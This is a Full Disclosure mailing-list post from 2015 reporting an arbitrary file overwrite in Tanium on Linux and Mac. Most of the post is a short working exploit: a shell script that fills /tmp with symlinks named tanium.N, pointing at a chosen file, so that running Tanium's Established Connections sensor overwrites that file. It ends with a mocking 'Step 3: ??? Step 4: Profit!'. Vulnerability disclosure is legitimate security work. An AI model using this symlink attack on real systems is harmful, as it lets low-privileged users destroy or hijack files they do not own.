[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] [CVE-2015-1234] Tanium all versions arbitrary file overwrite

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] [CVE-2015-1234] Tanium all versions arbitrary file overwrite
From: reek35@xxxxxxxxxxxx
Date: Thu, 4 Jun 2015 12:24:00 -0000

##############################################################
#                                                            #
#        TANIUM ALL VERSIONS ARBITRARY FILE OVERWRITE        #
#                                                            #
#        TANIUM allows lowest privileged users on            #
#        Linux and Mac systems to overwrite any file         #
#        of their choosing in 15 seconds.                    #
#                                                            #
#        Impossible? Think again.                            #
#                                                            #
##############################################################

Step 1:

#!/bin/sh

i=0; j=$(cat /proc/sys/kernel/pid_max)
while true; do
  ln -s $1 /tmp/tanium.$i
  [ $i -eq $j ] && break
  i=$((i+1))
done

Step 2: Execute Established Connections sensor.

Step 3: ???

Step 4: Profit!




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] [Multiple CVE's]: various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc)
Next by Date: [FD] [CVE-2015-4051]: Beckhoff IPC diagnostics < 1.8 : Authentication bypass
Previous by thread: [FD] [Multiple CVE's]: various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc)
Next by thread: [FD] [CVE-2015-4051]: Beckhoff IPC diagnostics < 1.8 : Authentication bypass
Index(es):
- Date
- Thread